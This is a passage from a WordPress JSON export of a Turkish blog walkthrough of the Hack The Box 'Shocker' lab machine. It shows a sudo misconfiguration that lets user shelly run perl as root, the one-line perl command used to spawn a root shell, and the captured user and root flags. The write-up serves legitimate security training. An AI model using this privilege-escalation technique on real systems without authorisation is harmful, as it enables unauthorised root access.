secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser shelly may run the following commands on Shocker:\n    (root) NOPASSWD: \/usr\/bin\/perl<\/code><\/pre>\n<pre><code class=\"language-sh\">shelly@Shocker:\/usr\/lib\/cgi-bin$ sudo \/usr\/bin\/perl -e &#039;exec &quot;\/bin\/sh&quot;;&#039;\nsudo \/usr\/bin\/perl -e &#039;exec &quot;\/bin\/sh&quot;;&#039;\nid\nuid=0(root) gid=0(root) groups=0(root)\ncd \/home\nls\nshelly\ncd shelly\nls\nuser.txt\ncat user.txt\nea68349c897b2d362588808569326dfe\ncd \/root\nls\nroot.txt\ncat root.txt\nd91210120544099ceb692b547b1d7a15<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Makine Ad\u0131 Seviye OS Logo Shocker &#8211; HTB Kolay Linux Walkthrough nmap taramas\u0131 ile ba\u015flayal\u0131m. PORT STATE SERVICE VERSION 80\/tcp open http Apache httpd 2.4.18&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/02\/shocker\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Shocker<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[350],"class_list":["post-1459","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-shellshock","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1459","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1459"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1459\/revisions"}],"predecessor-version":[{"id":1460,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1459\/revisions\/1460"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1459"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1459"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1459"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}